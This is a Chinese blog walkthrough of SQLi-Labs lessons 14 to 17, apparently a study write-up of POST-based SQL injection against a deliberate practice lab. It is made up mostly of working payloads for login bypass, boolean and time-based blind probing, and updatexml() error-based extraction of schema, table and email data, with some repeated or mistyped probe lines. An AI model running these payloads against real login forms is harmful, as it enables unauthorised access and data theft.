SqliLab_Mysql_Injection详解_字符型注入(七)_POST型注入_报错注入/布尔/时间盲注(14~17)

最新推荐文章于 2024-09-07 20:44:48 发布
最新推荐文章于 2024-09-07 20:44:48 发布
阅读量570 收藏
点赞数
分类专栏: # MYSQL注入学习 文章标签: POST型注入 报错注入 布尔/时间盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41260930/article/details/102737752
版权

文章目录

1. SqliLab_Mysql_Injection详解_字符型注入(七)
1.1. SQL注入_POST型注入
1.2. 原理

区别于GET型注入,POST型注入,通常是对包含在传递的数据包中参数进行注入,这里的数据包通常使用抓包工具来抓取(如BURPSUIT和wireshark等),然后更改数据包的内容来达到注入的目的;

2. SqliLab关卡(包含14,15,16,17)(图片占据空间太大,payload具体返回情况均写在每条payload下的注释中)
2.1. SqliLab-14(POST 型注入_报错注入(双引号闭合)):
2.1.1. 初始界面

在这里插入图片描述

2.1.2. 判断注入点(关键步骤)

由初始界面显示知道,可以看到需要我们输入username和password,根据登录的查询语句的一般结构,所以对username输入处构造判断注入点链接(截断后面语句方式);
尝试使用一般的单引号(’)闭合参数,由于之前遇到过没有使用闭合字符的例子,所以一开始先不使用闭合字符进行判断(通过浏览器的开发者调试查看页面标签元素,发现POST传送参数为uname和passwd);
EG:

uname=a or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(')代替()进行构造;
uname=a' or 1=1 %23&passwd=1&submit=Submit6
//服务器返回页面错误(预期正确),尝试用(")代替(')进行构造;
uname=a" or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面正确(预期正确),尝试用(or 1=2)进行构造;
uname=a" or 1=2 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期错误),判断出参数‘uname’存在注入,闭合字符为【"】;

在这里插入图片描述
由此,判断出参数‘uname’存在POST注入(xor一样),闭合字符为【"】,万能密码登录为(admin"#);
EG:
判断服务器返回页面是否存在SQL语句报错信息提示;

uname=a"' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误有提示(预期错误有提示),存在SQL语句报错信息提示;

在这里插入图片描述
在注入点判断过程中,可以发现,服务器在接受请求后,返回的页面存在无回显和有报错提示的情况,这时候如果再利用UNION联合查询法查看显位的方式就失效了,可以采用报错注入的方式(updatexml()函数,extractvalue(),floor()函数等)来获取想要的信息,具体流程和SqliLab-13的一模一样(只是payload的URL链接(13转变为14)和参数的字符闭合方式发生变化(’)转变为"),SqliLab-14结束;

2.2. SqliLab-15(POST 型注入_布尔/时间盲注(单引号闭合)):
2.2.1. 初始界面

在这里插入图片描述

2.2.2. 判断注入点(关键步骤)

由初始界面显示知道,可以看到需要我们输入username和password,根据登录的查询语句的一般结构,所以对username输入处构造判断注入点链接(截断后面语句方式);
尝试使用一般的单引号(’)闭合参数,由于之前遇到过没有使用闭合字符的例子,所以一开始先不使用闭合字符进行判断(通过浏览器的开发者调试查看页面标签元素,发现POST传送参数为uname和passwd);
EG:

uname=a or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(')代替()进行构造;
uname=a' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面正确(预期正确),尝试用(or 1=2)进行构造;
uname=a' or 1=2 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期错误),判断出参数‘uname’存在注入,闭合字符为【'】;

在这里插入图片描述
由此,判断出参数‘uname’存在POST注入(xor一样),闭合字符为【’】(万能密码登录为(admin’#)),且无回显信息;
EG:
判断服务器返回页面是否存在SQL语句报错信息提示;

uname=a'' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误无提示(预期错误有提示),尝试下面链接;
uname=a'" or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误无提示(预期错误有提示),尝试下面链接;
uname=a'^$& or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误无提示(预期错误有提示),尝试下面链接;
uname=a^$&)* or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误无提示(预期错误有提示),尝试下面链接;
...

经过尝试,服务器返回页面不存在SQL语句报错信息提示,尝试是否存在布尔盲注或者时间盲注;
EG:

uname=a' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面正确无显示(预期正确有提示),尝试下面链接;
uname=a' or 1=2 %23&passwd=1&submit=Submit
//服务器返回页面错误无显示(预期错误有显示),尝试下面链接;
uname=admin' and if(1=1,sleep(5),1) %23&passwd=1&submit=Submit
//服务器返回页面存在时间延迟(预期有延迟),尝试下面链接;
uname=admin' and if(1=2,sleep(5),1) %23&passwd=1&submit=Submit
//服务器返回页面不存在时间延迟(预期无延迟),判断出参数(uname)存在时间盲注;

经过尝试,服务器返回页面存在布尔盲注或者时间盲注;

2.2.3. 收集数据库信息

EG:
布尔盲注(使用left(),length(),ascii(),substr()/substring()函数, 构造链接):

uname=a' or left(version(),1)='5' %23&passwd=1&submit=Submit
//返回mysql版本的第一个字符,已查询到为(5);
uname=a' or length(user())='5' %23&passwd=1&submit=Submit
//返回数据库当前用户名的长度,已查询到为(5);
...
2.2.4. 求当前数据库名(字符或者ASCII值)

使用left()函数(求字符)(a~z,A~Z)或者用ascii()函数和substr(string,start,len)/substring(string,start,len) 函数(求ASCII值(共128个))(65~122),得到ASCII值再转换成字符;
求字符:
EG:

uname=a' or left(database(),1)='s' %23&passwd=1&submit=Submit
//返回当前数据库名的第一个字符,已查询到为(s);
...
2.2.5. 求当前数据库中表的数量

使用count()函数求数据库中的表的数量;
EG:

uname=a' or (select count(table_name) from information_schema.tables where table_schema=database())=4 %23&passwd=1&submit=Submit
//返回当前数据库中表的数量,已查询到为(4);
2.2.6. 求当前数据库中的各个表的长度

使用length()函数判断数据库中表的长度,使用limit来选择要判断的表;
EG:

uname=a' or length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6%23&passwd=1&submit=Submit
//返回当前数据库中的第一个表的长度,已查询到为(6);
...
2.2.7. 求当前数据库中的各个表的表名(字符或者ASCII值)

使用left()函数(求字符)(a~z,A~Z)或者用ascii()函数和substr(string,start,len)/substring(string,start,len) 函数(求ASCII值(共128个))(65~122),得到ASCII值再转换成字符;
求字符:
EG:

uname=a' or left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e' %23&passwd=1&submit=Submit
//返回当前数据库中的第一个表的表名的第一个字符;已查询到为(e);
...
2.2.8. 求‘users’表中的字段数量

使用count()函数求‘users’表中的字段的数量;
EG:

uname=a' or (select count(column_name) from information_schema.columns where table_name='users')=3 %23&passwd=1&submit=Submit
//返回‘users’表中的字段数量,已查询到为(3);
2.2.9. 求‘users’表中的各个字段的长度

使用length()函数判断数据库中表的长度,使用limit来选择要判断的表;
EG:

uname=a' or length((select column_name from information_schema.columns where table_name='users' limit 0,1))=2%23&passwd=1&submit=Submit
//返回‘users’表的第一个字段的长度,已查询到为(2);
...
2.2.10. 求‘users’表中的各个字段的值(字符或者ASCII值)

使用left()函数(求字符)(a~z,A~Z)或者用ascii()函数和substr(string,start,len)/substring(string,start,len) 函数(求ASCII值(共128个))(65~122),得到ASCII值再转换成字符;
求ASCII值:
EG:

uname=a' or ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105 %23&passwd=1&submit=Submit
//返回‘users’表的第一个字段的第一个字符的ASCII值,已查询到为(105),转换字符为(i);
...
2.2.11. 求‘users’表中的各个字段的值的信息(字符或者ASCII值)

使用left()函数(求字符)(a~z,A~Z,0~9)或者用ascii()函数和substr(string,start,len)/substring(string,start,len) 函数(求ASCII值(共128个)),得到ASCII值再转换成字符;
求‘users’表中的第一个字段‘id’的第一条信息;
求ASCII值:
EG:

uname=a' or ascii(substr((select id from users limit 0,1),1,1))=49 %23&passwd=1&submit=Submit
//返回‘users’表的第一个字段‘id’的第一条信息的第一个字符的ASCII值,已查询到为(49),转换为字符为(1);
...

同理对于字段(username,password)的值信息也是采取一样的方式进行查询,查询其他的值也是同上面的方法一致;到此,SQL注入(布尔盲注)基础流程差不多就结束了,所需要的信息(数据库信息,表字段值等)差不多都已经搜集到了,SqliLab-15结束;

2.3. SqliLab-16(POST 型注入_布尔盲注/时间盲注(")闭合)):
2.3.1. 初始界面

在这里插入图片描述

2.3.2. 判断注入点(关键步骤)

由初始界面显示知道,可以看到需要我们输入username和password,根据登录的查询语句的一般结构,所以对username输入处构造判断注入点链接(截断后面语句方式);
尝试使用一般的单引号(’)闭合参数,由于之前遇到过没有使用闭合字符的例子,所以一开始先不使用闭合字符进行判断(通过浏览器的开发者调试查看页面标签元素,发现POST传送参数为uname和passwd);
EG:

uname=a' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(')代替()进行构造;
uname=a' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(")代替(')进行构造;
uname=a" or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用())代替(")进行构造;
uname=a) or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(])代替())进行构造;
uname=a] or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(})代替(])进行构造;
uname=a} or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('')代替(})进行构造;
uname=a'' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('")代替('')进行构造;
uname=a'" or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('))代替('")进行构造;
uname=a') or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('])代替('))进行构造;
uname=a'] or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('})代替('))进行构造;
uname=a'} or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("')代替('})进行构造;
uname=a"' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("")代替("')进行构造;
uname=a"" or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("))代替("")进行构造;
uname=a") or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("))代替("")进行构造;
uname=a") or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("])代替("))进行构造;
uname=a"] or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("})代替("])进行构造;
uname=a"} or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用()')代替("})进行构造;
uname=a)' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用()")代替()')进行构造;
uname=a)" or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用()))代替()")进行构造;
uname=a)) or 1=1 %23&passwd=1&submit=Submit
...
//发现无论构造怎样的闭合字符的payload,服务器返回页面都不发生改变,尝试用admin进行测试,是否存在盲注;
uname=admin and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(')代替()进行构造;
uname=admin' and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(")代替(')进行构造;
uname=admin" and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用())代替(")进行构造;
uname=admin) and i1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('')代替())进行构造;
uname=admin'' and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('")代替('')进行构造;
uname=admin'" and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('))代替('")进行构造;
uname=admin') and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("')代替('))进行构造;
uname=admin"' and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("")代替("')进行构造;
uname=admin"" and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("))代替("")进行构造;
uname=admin") and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面正确(预期正确),尝试用1=2进行构造;
uname=admin") and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期错误),判断出参数(uname)存在盲注,参数的闭合字符为(")),测试是否含有时间盲注;
uname=admin") and if(1=1,sleep(5),1) %23&passwd=1&submit=Submit
//服务器返回延迟为7秒(2秒查询,5秒休眠),尝试sleep(7);
uname=admin") and if(1=1,sleep(5),1) %23&passwd=1&submit=Submit
//服务器返回延迟为9秒(2秒查询,7秒休眠),尝试sleep(9);
uname=admin") and if(1=1,sleep(5),1) %23&passwd=1&submit=Submit
//服务器返回延迟为11秒(2秒查询,9秒休眠),基本可以判断参数(id)存在时间注入;

由此,判断出参数‘uname’存在POST注入,闭合字符为【")】(万能密码登录为(admin")#)),且存在无回显信息无报错提示,存在布尔和时间注入,可以考虑使用盲注来获取想要的信息,知道了注入点以及可以采用的注入方式后,就很好构造payload去获取想要获取的信息了,这里采用布尔盲注的策略,具体流程和SqliLab-15的一模一样(只是payload的URL链接(15转变为16)和参数的字符闭合方式发生变化('转变为")),SqliLab-16结束;

2.4. SqliLab-17(POST 型注入_报错注入(单引号闭合)(使用update语句(参数passwd)更改password)):
2.4.1. 初始界面

在这里插入图片描述

2.4.2. 判断注入点(关键步骤)

由初始界面显示知道,可以看到需要我们输入username和password,根据登录的查询语句的一般结构,所以对username输入处构造判断注入点链接(截断后面语句方式);
尝试使用一般的单引号(’)闭合参数,由于之前遇到过没有使用闭合字符的例子,所以一开始先不使用闭合字符进行判断(通过浏览器的开发者调试查看页面标签元素,发现POST传送参数为uname和passwd);
EG:

uname=a' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(')代替()进行构造;
uname=a' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(")代替(')进行构造;
uname=a" or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用())代替(")进行构造;
uname=a) or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(])代替())进行构造;
uname=a] or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(})代替(])进行构造;
uname=a} or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('')代替(})进行构造;
uname=a'' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('")代替('')进行构造;
uname=a'" or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('))代替('")进行构造;
uname=a') or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('])代替('))进行构造;
uname=a'] or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('})代替('))进行构造;
uname=a'} or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("')代替('})进行构造;
uname=a"' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("")代替("')进行构造;
uname=a"" or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("))代替("")进行构造;
uname=a") or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("))代替("")进行构造;
uname=a") or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("])代替("))进行构造;
uname=a"] or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("})代替("])进行构造;
uname=a"} or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用()')代替("})进行构造;
uname=a)' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用()")代替()')进行构造;
uname=a)" or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用()))代替()")进行构造;
uname=a)) or 1=1 %23&passwd=1&submit=Submit
...
//发现无论构造怎样的闭合字符的payload,服务器返回页面都不发生改变,尝试用admin进行测试,是否存在盲注;
uname=admin and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(')代替()进行构造;
uname=admin' and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(")代替(')进行构造;
uname=admin" and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用())代替(")进行构造;
uname=admin) and i1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('')代替())进行构造;
uname=admin'' and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('")代替('')进行构造;
uname=admin'" and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('))代替('")进行构造;
uname=admin') and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("')代替('))进行构造;
uname=admin"' and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("")代替("')进行构造;
uname=admin"" and 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("))代替("")进行构造;
uname=admin") and 1=1 %23&passwd=1&submit=Submit
...

经过尝试发现(宽字节绕过,特殊字符过滤绕过等),参数(uname)不存在注入,尝试对参数(passwd)进行测试,根据初始页面的(PASSWORD RESET)提示,猜测服务器接收请求后,后台可能执行了update语句,更新password,update语句结构为update table set passwd = ’ ’ where uname = ’ ’ ;),尝试通过观察update语句(password值是否改变)对参数passwd进行注入点判断;
EG:
使用闭合符号进行尝试,查看是否被带入语句中执行(原有password是否被更改);

uname=admin&passwd='&submit=Submit
//单引号没有被显示(单引号不显示),可能存在注入(存在报错提示),尝试(\')代替(')进行构造;
uname=admin&passwd=\'&submit=Submit
//单引号显示(单引号显示),参数passwd存在注入,闭合字符为【'】;

在这里插入图片描述
在这里插入图片描述
EG:
使用sleep()函数进行判断

uname=admin&passwd=a' or sleep(5) or '&submit=Submit
//服务器返回延迟为7秒(2秒查询,5秒休眠)(预期有时间延迟),参数passwd存在注入,闭合字符为【'】;

在这里插入图片描述
经过上面测试得知,参数passwd存在注入,闭合字符为【’】,服务器返回页面存在SQL语句报错信息提示(可以尝试使用报错注入)和时间延迟(可以尝试使用时间盲注),这里采用报错注入的方式获取想要的信息比较快捷;

2.4.3. 收集数据库信息

EG:
使用updatexml()函数/extractvalue()函数/使用floor()函数,group_concat()函数/concat()函数,version()函数,database()函数等构造payload;

uname=admin&passwd=a' and updatexml(1,concat(0x7c,version(),0x7c,database(),0x7c, user(),0x7c),1) %23&submit=Submit
//返回数据库的版本信息,当前使用数据库的名字,数据库用户;
...

在这里插入图片描述

2.4.4. 查询Mysql中存在的其他数据库

EG:
使用updatexml()函数/extractvalue()函数/使用floor()函数,group_concat()函数/concat()函数和mid()函数/limit限制构造payload;

uname=admin&passwd=a' and updatexml(1,mid(concat(0x7c,(select group_concat(schema_name) from information_schema.schemata),0x7c),1,32),1) %23&submit=Submit
//查看到报错信息显示了当前使用mysql中使用的数据库有哪些数据库,mid()函数来截取返回的较长字符串;
...
2.4.5. 查询当前数据库‘security’存在的表

EG:
使用updatexml()函数/extractvalue()函数/使用floor()函数,group_concat()函数/concat()函数和mid()函数/limit限制构造payload;

uname=admin&passwd=a' and updatexml(1,concat(0x7c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7c),1) %23&submit=Submit
//查看到报错信息显示了当前使用数据库中存在的表有(emails,referers,uagents,users);
2.4.6. 查询‘emails’表的字段

EG:
使用updatexml()函数/extractvalue()函数/使用floor()函数,group_concat()函数/concat()函数和mid()函数/limit限制构造payload;

uname=admin&passwd=a' and updatexml(1,concat(0x7c,(select group_concat(column_name) from information_schema.columns where table_name='emails'),0x7c),1) %23&submit=Submit
//查看到报错信息显示了‘users’表的字段为(id,email_id)
2.4.7. 查询‘emails’表的字段值信息(无法查看到users表的字段值信息,是因为执行update语句的表就是users表)

EG:
使用updatexml()函数/extractvalue()函数/使用floor()函数,group_concat()函数/concat()函数和mid()函数/limit限制构造payload;

uname=admin&passwd=a' and updatexml(1,mid(concat(0x7c,(select group_concat(id,0x7c,email_id,0x7c) from emails),0x7e),1,32),1) %23&submit=Submit
查看到报错信息显示了‘emails’表的字段值信息为(|1|Dumb@dhakkan.com|,2|Angel@ilo。。。。。。);
...

查询其他的值也是同上面的方法一致;到此,POST型注入(报错注入)基础流程差不多就结束了,所需要的信息(数据库信息,表字段值等)差不多都已经搜集到了,SqliLab-17结束。

3.总结

注入的开始步骤就是判断注入点,同时也是比较费时间的步骤,注入点成功判断,才能为后面的payload提供基础,判断的时候覆盖面尽量多一些,增加判断成功概率,同时,如果一个参数发现不了注入点,考虑更换一个参数进行尝试,同时要同判断时发现的一些线索,判断服务器后台可能执行的SQL语句的基本结构是什么,然后根据语句结构,尝试构造测试payload,最后,通过注入点的成功判断,要尽量选择快捷的注入方式(盲注时间相对较长)来获取想要的数据库信息。

[如有错误,请指出,拜托了<( _ _ )> !!!]

Tes789123456
关注
专栏目录
sqlilab--writeup (5~6) 布尔盲注
weixin_45694388的博客
12-07 244
1.# 和 – (有个空格)表示注释,可以使它们后面的语句不被执行。在url中,如果是get请求**(记住是get请求,也就是我们在浏览器中输入的url)** ,解释执行的时候,url中#号是用来指导浏览器动作的,对服务器端无用。所以,HTTP请求中不包括#,因此使用#闭合无法注释,会报错;而使用-- (有个空格),在传输过程中空格会被忽略,同样导致无法注释,所以在get请求传参注入时才会使用–+的方式来闭合,因为+会被解释成空格。 . 2.当然,也可以使用–%20,把空格转换为urlencode编码格式.
sqli-labs Less-5(布尔盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
01-31 670
前几篇sql注入文章 sqli-labs Less-1(联合注入字符注入sqli-labs Less-2(联合注入、整形注入sqli-labs Less-3(联合注入字符注入sqli-labs Less-4(联合注入字符注入sqli-labs Less-5(利用extractvalue进行报错注入sqli-labs Less-5(双注入布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利
sqli-labs-基于布尔盲注
zlloveyouforever的博客
04-29 1129
sqli-labs第五关--基于布尔盲注
SqliLab_Mysql_Injection详解_字符注入(四)_布尔盲注/高权限注入(7)
qq_41260930的博客
10-21 702
SqlLab_Mysql_Injection详解_字符注入(五) SQL注入_布尔盲注 Mysql高权限注入-文件读写into outfile()/into dumpfile()/load_file() 原理 Mysql数据库可以导入或者导出文件,通过添加恶意代码到导出文件中(如写入webshell),并生成到指定目录下,达到上传恶意文件到服务器上的目的(如菜刀或者蚁剑连接导出文件中的一句话木...
sqli-labs 盲注命令
LztCode
10-16 293
sql盲注 sqli-less8布尔注入,跟dvwa差不多,下面列出猜解代码 查版本。?id=1’and left(version(),1)=5–+ 查库名。?id=1’and ascii(substr(database(),1,1))=115–+ 查表数。?id=1’and (select count(table_name)from information_schema.tables where table_schema=‘security’)=4–+ 查表长。?id=1’and length(subst
MySQL数据库的SQL注入漏洞解析
最新发布
CoffeMilk的博客
09-07 1210
SQL注入总结起来就是:没有对用户输入提交的数据内容的合法性进行严格的判断或过滤,就直接将这些伪造的数据内容带入到数据库执行,导致数据泄露或损坏,甚至导致完全接管主机的一种安全漏洞。
sql注入详解
m0_73109590的博客
08-03 1041
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。...
【DVWA】--- 八、sql盲注(SQL Injection Blind)
qq_43168364的博客
05-31 787
SQL Injection Blind 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 注入点在输入框中,当输入正确时回显如下图 输入错误时的回显 根据回显不同进行布尔盲注,接下来判断注入 这里是字符注入字符注入点 判断库名长度,命令:1' and length(database())=4 # 判断库名,命令:1’ and ascii(substr(database(),x,1))=100 #让x的值递增可以遍
sql注入知识点
m0_55772907的博客
04-27 3724
1 Sqllab渗透测试天书 Microsoft英文文档 ORDER BY Clause (Transact-SQL) - SQL Server | Microsoft DocsSELECT - ORDER BY Clause (Transact-SQL)https://docs.microsoft.com/en-us/sql/t-sql/queries/select-order-by-clause-transact-sql?view=sql-server-ver152 Iwebsec靶场 判断字
SqliLab_Mysql_Injection详解_字符注入(三)_布尔盲注/报错注入(6)
qq_41260930的博客
10-20 791
SqlLab_Mysql_Injection详解_字符注入(四) SQL注入_布尔盲注 SQL注入_报错注入 原理 由于服务器在接受请求后,返回的页面存在报错提示的情况,可以使用一些特殊的函数在特殊的情况下,返回所想要获取的数据库信息; 常用的函数: UPDATEXML(XML_document,XPath_string,new_value)函数 第一个参数XML_document:XML_d...
Less 15-16(POST布尔注入)
老司机开代码的博客
08-03 380
文章目录1. 题目分析2. 注入过程less-16 1. 题目分析 首先分析页面,发现网站此时完全规避了报错信息。连双注入都不会再由报错信息提示到页面上。因此,我们无法通过报错的信息来获取网站的数据库信息。这是我们只能换一种思路—盲注。 通过多次尝试,我们发现,网站有两种响应状态,分别是successfully和failed。 那么我们可以知道,当条件语句为true的时候,就会返回successf...
sql_labsqli中的post注入
qq_59020256的博客
12-20 498
username=1'or 1=1 order by 4 #&password=123&submit=%E7%99%BB%E5%BD%95 没有回显。username=1'or 1=1 order by 3 #&password=123&submit=%E7%99%BB%E5%BD%95 有回显。username=1'or 1=2 #&password=123&submit=%E7%99%BB%E5%BD%95 没有回显。3.用union查询判断回显点。5.查询当前数据库中的表名。1.判断是否存在注入
Sqli-labs2-5单引号变形,双引号,双注入
Recar的博客
12-12 4331
第二题第二个就是整形的了第一个是字符串的整形与字符注入的区别!!!整形是不用单引号闭合的,不要后面注释直接 union联合查询就可以了~~ 接下来就可以继续向第一题那样测试了整不需要闭合就可以执行后面的语句,字符的则要闭合http://localhost:9096/sqli-labs/Less-2/?id=-1 union select 1,2,table_name from informat
sqlilab实战
weixin_40138844的博客
10-26 723
Lesson1.less1 ?id=1正常显示 ?id=1' 显示错误,根据错误信息,可以确定是单引号闭合, where id = 'input' limit 尝试使用‘ 加上 --+,#等注释符号修正错误,输入?id=1'--+,问题被修复。 ?id=1' ............ --+利用.....部分我们可以输入我们想要执行的语句进行注入测试。and 1=1 and ...
SQL手动注入的方式;常用绕过手段;get和post基于时间布尔盲注
idgrown的博客
02-23 1018
#1## 标题 :SQL注入原理 1.1、介绍SQL注入:: SQL注入就是指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻 击者可控的,并且参数代入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库 任意操作 1.2、SQL注入漏洞的产生需要满足两个条件: 1 参数用户可控 2 参数带入数据库查询,传入的参数拼接到SQL语句,并且带入数据库查询 1.3、SQL注入...
SqliLab_Mysql_Injection详解_字符注入(十二)_堆叠注入_POST/二次/报错注入/布尔/时间盲注(38~45)
qq_41260930的博客
11-01 800
1. SqliLab_Mysql_Injection详解_字符注入(十二) 1.1. SQL注入_堆叠注入 1.2. 原理 堆叠注入与受限于select语句的联合查询法(字段数的多少)相反,堆叠注入可用于执行任意数量的SQL语句或过程。相当于是就是mysql的多语句查询。 1.3. 限制条件 堆叠注入并不是在任何环境下都可以执行的,可能受到API或数据库引擎不支持的限制(如Oracle数据库)...
SqliLab_Mysql_Injection详解_字符注入(八)_POST注入_HTTP头注入(18~22)
qq_41260930的博客
10-29 815
SqlLab_Mysql_Injection详解_字符注入(九) SQL注入_POST注入(HTTP头注入) 原理 HTTP头注入是指从HTTP头中获取数据,而未对获取到的数据进行过滤,从而产生的注入。 HTTP基础 Accept:浏览器能够处理的内容类; Accept-Charset:浏览器能够显示的字符集; Accept-Encoding:浏览器能够处理的压缩编码; Accept-La...
Sqli-labs之Less-7
→_→
03-26 1702
Less-7 GET - 导入文件- 字符串 分析数字/字符及单/双引号注入: 我们可以分别尝试将 ?id=1 ?id=1' ?id=1"添加到url中,进行测试,发现?id=1'报错,初步判断为字符注入,经过测试后发现正常返回 You are in.... U...
sqli-labs 第关 多命通关攻略
两个月亮
01-05 1794
错误输入与不正常输入的返回结果是相同的。该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。怎么会这样?等等,我们刚刚得出的结论好像被忽略了:该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。既然返回结果为空都将返回,那我们刚刚构造的判断语句又怎么能够判断出注入呢?在遇到读写权限问题后,尝试向搜索引擎寻求帮助,但解决方案大多针对 Linux 操作系统且并不详细,只好自己摸索了。
修复freeswitch mod_odbc_cdr模块写入mysql失败时的本地csv话单问题
"本文主要探讨了freeswitch的mod_odbc_cdr模块在处理话单记录时遇到的问题,以及如何修复这个导致话单无法在写入MySQL数据库失败时转存到本地CSV文件的bug。这个问题涉及到freeswitch的事件处理机制,特别是mod_odbc...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值